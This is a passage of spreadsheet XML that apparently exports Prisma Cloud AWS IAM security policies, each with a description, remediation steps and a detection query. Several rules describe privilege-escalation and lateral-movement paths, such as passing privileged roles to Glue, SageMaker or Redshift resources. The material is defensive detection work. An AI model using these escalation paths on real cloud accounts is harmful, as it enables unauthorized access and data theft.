      <c r="Q3206" t="inlineStr"/>
      <c r="R3206" t="inlineStr"/>
      <c r="S3206" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3206" t="b">
        <v>0</v>
      </c>
      <c r="U3206" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3206" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3206" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM Groups and Roles with Stale IAM  Metadata Read Permissions.
Risk of Unused Metadata Read Permissions:
Even seemingly harmless permissions like "Metadata Read" in AWS IAM can be risky if left unused for extended periods. Unused IAM groups and roles with IAM  Metadata Read permissions for 90 days present a security concern because:
Information Gathering Tool: An attacker with access to these credentials could use them to gather information about your AWS environment. This information could include project structures, S3 bucket locations, or security group configurations. Attackers could exploit this knowledge to identify vulnerabilities or plan more targeted attacks.
Lateral Movement Potential: A compromised unused group or role with Metadata Read permissions could be a stepping stone for attackers. They might leverage this access to discover and exploit further vulnerabilities within your AWS environment, potentially leading to unauthorized access to more sensitive data or systems.
Mitigating the Risk:
Regular Review and Removal: Regularly identify and remove unused IAM groups and roles with any level of IAM  Metadata access (Read or Write) on a scheduled basis.
Principle of Least Privilege: Adhere to the principle of least privilege. Grant only the minimum level of Metadata Read access required for a group or role to function ly. Evaluate if alternative methods, like IAM conditions, can restrict access to specific EC2 instances or S3 buckets.
Monitor for Suspicious Activity: Utilize CloudTrail to track API calls made within your AWS environment, including those leveraging IAM roles. This vigilance can help detect unusual activity related to unused groups or roles that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3206"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206" t="inlineStr"/>
      <c r="Z3206" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and grantedby.cloud.entity.type NOT IN ('user') AND grantedby.cloud.policy.type != 'Resource-based Policy'  and action.access.level = 'Metadata Read' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3206" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3206" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3206" t="inlineStr"/>
      <c r="AD3206" t="b">
        <v>1</v>
      </c>
      <c r="AE3206" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3206" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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6" t="inlineStr">
        <is>
          <t>d0f0b65e-522e-47c7-90df-57f24a3e2573</t>
        </is>
      </c>
      <c r="AI3206" t="inlineStr">
        <is>
          <t>d0f0b65e-522e-47c7-90df-57f24a3e2573</t>
        </is>
      </c>
      <c r="AJ3206" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3206" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3207">
      <c r="A3207" t="inlineStr"/>
      <c r="B3207" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3207" s="2" t="inlineStr"/>
      <c r="D3207" t="n">
        <v>0</v>
      </c>
      <c r="E3207" t="n">
        <v>396</v>
      </c>
      <c r="F3207" t="n">
        <v>0</v>
      </c>
      <c r="G3207" t="b">
        <v>1</v>
      </c>
      <c r="H32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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3207" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3207" t="inlineStr">
        <is>
          <t>AWS IAM effective permissions are over-privileged (90 days)</t>
        </is>
      </c>
      <c r="L3207" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3207" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3207" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3207" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3207" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3207" t="inlineStr"/>
      <c r="R3207" t="inlineStr"/>
      <c r="S3207" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3207" t="b">
        <v>1</v>
      </c>
      <c r="U3207" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3207" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3207" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM permissions that are over-privileged. As a security best practice, it is recommended to grant the least privilege access like granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3207" t="inlineStr">
        <is>
          <t>Remediation for a user:
1. Log in to the AWS console
2. Navigate to the IAM service
3. Click on Users
4. Choose the relevant user
5. Under 'Permissions policies', find the relevant policy according to the alert details and remove the excessive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excessive actions
----------------------------------------
Remediation for a Resource-based Policy:
1. Log in to the AWS console
2. Navigate to the relevant service (For example, AWS S3)
3. Find resource-based policy of the resource
4. Remove the excessive actions according to the alert details</t>
        </is>
      </c>
      <c r="Y320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7" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3207" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3207" t="inlineStr">
        <is>
          <t>2022-11-11 04:03:13</t>
        </is>
      </c>
      <c r="AC3207" t="inlineStr"/>
      <c r="AD3207" t="b">
        <v>1</v>
      </c>
      <c r="AE3207" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3207" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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7" t="inlineStr">
        <is>
          <t>eeca101d-66b7-4e59-9090-3da5435da611</t>
        </is>
      </c>
      <c r="AI3207" t="inlineStr">
        <is>
          <t>eeca101d-66b7-4e59-9090-3da5435da611</t>
        </is>
      </c>
      <c r="AJ3207" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3207" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3208">
      <c r="A3208" t="inlineStr"/>
      <c r="B3208" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3208" s="2" t="inlineStr"/>
      <c r="D3208" t="n">
        <v>17</v>
      </c>
      <c r="E3208" t="n">
        <v>1</v>
      </c>
      <c r="F3208" t="n">
        <v>0</v>
      </c>
      <c r="G3208" t="b">
        <v>1</v>
      </c>
      <c r="H32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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3208" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3208" t="inlineStr">
        <is>
          <t>AWS EC2 Instance with AWS Organization management permissions</t>
        </is>
      </c>
      <c r="L3208" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3208" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3208" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3208" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3208" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3208" t="inlineStr"/>
      <c r="R3208" t="inlineStr"/>
      <c r="S3208" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3208" t="b">
        <v>1</v>
      </c>
      <c r="U3208" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3208" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3208" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow EC2 instances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208"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0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8"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source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3208" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3208" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3208" t="inlineStr"/>
      <c r="AD3208" t="b">
        <v>1</v>
      </c>
      <c r="AE3208" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3208" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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8" t="inlineStr">
        <is>
          <t>0acd23f7-12c8-48c2-88c4-2962a4778e6e</t>
        </is>
      </c>
      <c r="AI3208" t="inlineStr">
        <is>
          <t>0acd23f7-12c8-48c2-88c4-2962a4778e6e</t>
        </is>
      </c>
      <c r="AJ3208" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3208" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3209">
      <c r="A3209" t="inlineStr"/>
      <c r="B3209" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3209" s="2" t="inlineStr"/>
      <c r="D3209" t="n">
        <v>0</v>
      </c>
      <c r="E3209" t="n">
        <v>41</v>
      </c>
      <c r="F3209" t="n">
        <v>0</v>
      </c>
      <c r="G3209" t="b">
        <v>1</v>
      </c>
      <c r="H32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09" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3209" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3209" t="inlineStr">
        <is>
          <t>AWS Compute Instance (EC2/Lambda) Assigned Glue DevEndpoint Creation Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3209" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3209" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3209" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3209" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3209" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3209" t="inlineStr"/>
      <c r="R3209" t="inlineStr"/>
      <c r="S3209" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3209" t="b">
        <v>1</v>
      </c>
      <c r="U3209" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3209" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3209" t="inlineStr">
        <is>
          <t>An adversary able to create a Glue DevEndpoint with any role would be able to escalate their permissions by attaching a privileged role to the endpoint and configuring authentication to the endpoint using a key which they control. As such, they would obtain the ability to perform actions using the permissions of the attached role, allowing further enumeration and exploitation of the environment.</t>
        </is>
      </c>
      <c r="X3209" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to AWS Console
 2.Navigate to the EC2 instance or Lambda Function, and either replace the role for a less privileged one, or remove it entirely. If the role is not in use by any other entities, you could simply remove the role's excessive permissions.</t>
        </is>
      </c>
      <c r="Y320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09" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name CONTAINS ALL ('iam:PassRole', 'glue:CreateDevEndpoint') AND source.cloud.resource.type IN ('instance', 'function')</t>
        </is>
      </c>
      <c r="AA3209" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3209" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3209" t="inlineStr"/>
      <c r="AD3209" t="b">
        <v>1</v>
      </c>
      <c r="AE3209" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3209" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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09" t="inlineStr">
        <is>
          <t>f13c6791-8e1d-4985-9473-8463c2ab3e95</t>
        </is>
      </c>
      <c r="AI3209" t="inlineStr">
        <is>
          <t>f13c6791-8e1d-4985-9473-8463c2ab3e95</t>
        </is>
      </c>
      <c r="AJ3209" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3209" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3210">
      <c r="A3210" t="inlineStr"/>
      <c r="B3210" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3210" s="2" t="inlineStr"/>
      <c r="D3210" t="n">
        <v>0</v>
      </c>
      <c r="E3210" t="n">
        <v>121</v>
      </c>
      <c r="F3210" t="n">
        <v>0</v>
      </c>
      <c r="G3210" t="b">
        <v>1</v>
      </c>
      <c r="H32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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3210" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3210" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via PassRole &amp; SageMaker create notebook permissions</t>
        </is>
      </c>
      <c r="L3210" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3210" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3210" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3210" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3210" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3210" t="inlineStr"/>
      <c r="R3210" t="inlineStr"/>
      <c r="S3210" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3210" t="b">
        <v>1</v>
      </c>
      <c r="U3210" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3210" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3210" t="inlineStr">
        <is>
          <t>With access to the iam:PassRole, sagemaker:CreateNotebookInstance, and sagemaker:CreatePresignedNotebookInstanceUrl permissions, an adversary can create a new Jupyter notebook and pass a more privileged existing role to it. This would allow an adversary to escalate privileges to the more privileged role.</t>
        </is>
      </c>
      <c r="X3210"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
"</t>
        </is>
      </c>
      <c r="Y321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0" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'sagemaker:CreateNotebookInstance', 'sagemaker:CreatePresignedNotebookInstanceUrl' ) AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist and source.cloud.resource.id DOES NOT END WITH ':root'</t>
        </is>
      </c>
      <c r="AA3210" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3210" t="inlineStr">
        <is>
          <t>2023-12-08 03:58:20</t>
        </is>
      </c>
      <c r="AC3210" t="inlineStr"/>
      <c r="AD3210" t="b">
        <v>1</v>
      </c>
      <c r="AE3210" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3210" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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0" t="inlineStr">
        <is>
          <t>5983d2c5-fd8a-44da-bf89-03519b9e6706</t>
        </is>
      </c>
      <c r="AI3210" t="inlineStr">
        <is>
          <t>5983d2c5-fd8a-44da-bf89-03519b9e6706</t>
        </is>
      </c>
      <c r="AJ3210" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3210" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3211">
      <c r="A3211" t="inlineStr"/>
      <c r="B3211" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3211" s="2" t="inlineStr"/>
      <c r="D3211" t="n">
        <v>0</v>
      </c>
      <c r="E3211" t="n">
        <v>0</v>
      </c>
      <c r="F3211" t="n">
        <v>112</v>
      </c>
      <c r="G3211" t="b">
        <v>1</v>
      </c>
      <c r="H32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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3211" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3211" t="inlineStr">
        <is>
          <t>AWS Lateral Movement to Data Services Through Redshift Cluster Creation</t>
        </is>
      </c>
      <c r="L3211" t="inlineStr">
        <is>
          <t>DATA_EXFILTRATION</t>
        </is>
      </c>
      <c r="M3211" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3211" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3211" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3211" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3211" t="inlineStr"/>
      <c r="R3211" t="inlineStr"/>
      <c r="S3211" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3211" t="b">
        <v>1</v>
      </c>
      <c r="U3211" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3211" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3211" t="inlineStr">
        <is>
          <t>When an adversary gains access to redshift:CreateCluster and iam:PassRole permissions, they can establish a Redshift cluster. Utilizing the Default Role functionality and AWS Redshift's inherent features, such as the "COPY" command, the attacker able to move laterally in the environment is positioned to gain access to almost all sensitive resources in the environment.</t>
        </is>
      </c>
      <c r="X3211" t="inlineStr">
        <is>
          <t>When using iam:PassRole with any service, it should be scoped to only the resources required to pass the role to minimize the risk of privilege escalation. Follow these recommendations:
 For the iam:PassRole policy statement section:
 - Use the AWS pass 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steps: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21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1" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name CONTAINS ALL ('iam:PassRole', 'redshift:CreateCluster') and grantedby.cloud.entity.type = 'role' AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist</t>
        </is>
      </c>
      <c r="AA3211" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3211" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3211" t="inlineStr"/>
      <c r="AD3211" t="b">
        <v>1</v>
      </c>
      <c r="AE3211" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3211" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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1" t="inlineStr">
        <is>
          <t>4b82cb4a-4d6c-4371-8501-a1a519e2ea11</t>
        </is>
      </c>
      <c r="AI3211" t="inlineStr">
        <is>
          <t>4b82cb4a-4d6c-4371-8501-a1a519e2ea11</t>
        </is>
      </c>
      <c r="AJ3211" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3211" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3212">
      <c r="A3212" t="inlineStr"/>
      <c r="B3212" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3212" s="2" t="inlineStr"/>
      <c r="D3212" t="inlineStr"/>
      <c r="E3212" t="inlineStr"/>
      <c r="F3212" t="inlineStr"/>
      <c r="G3212" t="b">
        <v>1</v>
      </c>
      <c r="H32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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3212" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3212" t="inlineStr">
        <is>
          <t>AWS resources that are publicly accessible through IAM policies</t>
        </is>
      </c>
      <c r="L3212" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M3212" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3212" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3212" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3212" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3212" t="inlineStr"/>
      <c r="R3212" t="inlineStr"/>
      <c r="S3212" t="inlineStr"/>
      <c r="T3212" t="b">
        <v>0</v>
      </c>
      <c r="U3212" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3212" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3212" t="inlineStr">
        <is>
          <t>This policy identifies the AWS resources which are publicly accessible through IAM policies. The policy considers AWS conditions that limit public access. Ensure that the AWS resources provisioned in your AWS account are not publicly accessible from the Internet to avoid sensitive data exposure and minimize security risks.</t>
        </is>
      </c>
      <c r="X3212" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. Navigate to the relevant service (For example, AWS S3)
3. Find resource-based policy of the resource
4. Update the ‘Principal‘ section of the policy to avoid public access</t>
        </is>
      </c>
      <c r="Y3212" t="inlineStr"/>
      <c r="Z3212" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and source.public = true AND grantedby.cloud.policy.condition ( 'aws:SourceArn' ) does not exist AND grantedby.cloud.policy.condition ( 'aws:VpcSourceIp' ) does not exist AND grantedby.cloud.policy.condition ( 'aws:username' ) does not exist AND grantedby.cloud.policy.condition ( 'aws:userid' ) does not exist AND grantedby.cloud.policy.condition ( 'aws:SourceVpc' ) does not exist AND grantedby.cloud.policy.condition ( 'aws:SourceIp' ) does not exist AND grantedby.cloud.policy.condition ( 'aws:SourceIdentity' ) does not exist AND grantedby.cloud.policy.condition ( 'aws:SourceAccount' ) does not exist AND grantedby.cloud.policy.condition ( 'aws:PrincipalOrgID' ) does not exist AND grantedby.cloud.policy.condition ( 'aws:PrincipalArn' ) does not exist AND grantedby.cloud.policy.condition ( 'aws:SourceOwner' ) does not exist AND grantedby.cloud.policy.condition ( 'kms:CallerAccount' ) does not exist</t>
        </is>
      </c>
      <c r="AA3212" t="inlineStr">
        <is>
          <t>Carlos Castro</t>
        </is>
      </c>
      <c r="AB3212" t="inlineStr">
        <is>
          <t>2022-10-13 20:49:58</t>
        </is>
      </c>
      <c r="AC3212" t="inlineStr"/>
      <c r="AD3212" t="b">
        <v>1</v>
      </c>
      <c r="AE3212" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3212" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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2" t="inlineStr">
        <is>
          <t>9a0258db-cb7c-4f7b-876b-ac1ebae2ce1b</t>
        </is>
      </c>
      <c r="AI3212" t="inlineStr">
        <is>
          <t>9a0258db-cb7c-4f7b-876b-ac1ebae2ce1b</t>
        </is>
      </c>
      <c r="AJ3212" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3212" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3213">
      <c r="A3213" t="inlineStr"/>
      <c r="B3213" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3213" s="2" t="inlineStr"/>
      <c r="D3213" t="inlineStr"/>
      <c r="E3213" t="inlineStr"/>
      <c r="F3213" t="inlineStr"/>
      <c r="G3213" t="b">
        <v>1</v>
      </c>
      <c r="H32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13" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3213" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3213" t="inlineStr">
        <is>
          <t>Unprivileged Compute resource can assume a Service Account with admin privileges</t>
        </is>
      </c>
      <c r="L3213" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3213" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3213" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3213" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3213" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3213" t="inlineStr"/>
      <c r="R3213" t="inlineStr"/>
      <c r="S3213" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3213" t="b">
        <v>1</v>
      </c>
      <c r="U3213" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3213" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3213" t="inlineStr">
        <is>
          <t>Identifies unprivileged (not administrator) compute resources which can assume service accounts with administrative permissions. This risk is amplified due to the compute resource's attack surface, offering adversaries more opportunities to exploit vulnerabilities and escalate privileges, thereby expanding the potential blast radius.</t>
        </is>
      </c>
      <c r="X3213" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select the "Alert ID", then "Investigate"
2. In the results, you will see the compute instance ("Source") and the role attached to it ("Granted By Entity"). The administrative role will be shown as the "Destination". In cases where the source role ("Granted By Entity") and privileged role ("Destination") permissions are granted in different accounts, "Source" may contain administrative permissions for its original account.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source role ("Granted By Entity") so it cannot assume the privileged role.</t>
        </is>
      </c>
      <c r="Y321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3" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' AND source.cloud.resource.type IN ('instance', 'function') AND source.cloud.resource.isadministrative = false AND dest.cloud.resource.type = 'role' AND action.name = 'sts:AssumeRole' AND dest.cloud.resource.isadministrative = true</t>
        </is>
      </c>
      <c r="AA3213" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3213" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3213" t="inlineStr"/>
      <c r="AD3213" t="b">
        <v>1</v>
      </c>
      <c r="AE3213" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3213" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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13" t="inlineStr">
        <is>
          <t>1aa2c4d4-238f-411f-be01-61ba7c634967</t>
        </is>
      </c>
      <c r="AI3213" t="inlineStr">
        <is>
          <t>1aa2c4d4-238f-411f-be01-61ba7c634967</t>
        </is>
      </c>
      <c r="AJ3213" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3213" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3214">
      <c r="A3214" t="inlineStr"/>
      <c r="B3214" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3214" s="2" t="inlineStr"/>
      <c r="D3214" t="inlineStr"/>
      <c r="E3214" t="inlineStr"/>
      <c r="F3214" t="inlineStr"/>
      <c r="G3214" t="b">
        <v>1</v>
      </c>
      <c r="H32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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3214" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3214" t="inlineStr">
        <is>
          <t>AWS Okta User with IAM policy management permissions</t>
        </is>
      </c>
      <c r="L3214" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3214" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3214" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3214" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3214" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3214" t="inlineStr"/>
      <c r="R3214" t="inlineStr"/>
      <c r="S3214" t="inlineStr"/>
      <c r="T3214" t="b">
        <v>1</v>
      </c>
      <c r="U3214" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3214" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3214" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow Okta users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214" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Login to the Okta console
2. Find the role used by the Okta user
3. Log in to the AWS console
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y321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4"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source.idp.service = 'Okta'</t>
        </is>
      </c>
      <c r="AA3214" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3214" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3214" t="inlineStr"/>
      <c r="AD3214" t="b">
        <v>1</v>
      </c>
      <c r="AE3214" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3214" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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4" t="inlineStr">
        <is>
          <t>c14d0daf-bd4b-4b4f-8ee9-b41771217954</t>
        </is>
      </c>
      <c r="AI3214" t="inlineStr">
        <is>
          <t>c14d0daf-bd4b-4b4f-8ee9-b41771217954</t>
        </is>
      </c>
